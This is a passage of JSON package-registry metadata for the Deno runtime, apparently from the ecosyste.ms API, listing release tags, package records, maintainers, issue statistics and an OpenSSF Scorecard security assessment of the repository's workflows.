and/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:32:33.356Z","dependent_packages_count":0,"downloads":9202,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/darwin-x64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/darwin-x64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/darwin-x64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/darwin-x64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T21:25:12.625Z","updated_at":"2024-12-12T21:25:12.625Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T21:25:12.785Z","updated_at":"2024-12-12T21:25:12.785Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T21:25:12.842Z","updated_at":"2024-12-12T21:25:12.842Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:24.092Z","updated_at":"2026-03-27T13:02:24.092Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5812038,"maintainers_count":1244003,"namespaces_count":426096,"keywords_count":888784,"github":"npm","metadata":{"funded_packages_count":192391,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-01T05:02:08.896Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11082685,"name":"deno_telemetry","ecosystem":"cargo","description":"Telemetry for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":79,"first_release_published_at":"2024-11-25T16:56:15.862Z","latest_release_published_at":"2026-08-06T11:46:11.850Z","latest_release_number":"0.79.0","last_synced_at":"2026-08-29T21:57:11.845Z","created_at":"2024-11-25T17:03:29.803Z","updated_at":"2026-08-29T21:57:11.845Z","registry_url":"https://crates.io/crates/deno_telemetry/","install_command":"cargo install deno_telemetry","documentation_url":"https://docs.rs/deno_telemetry/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using 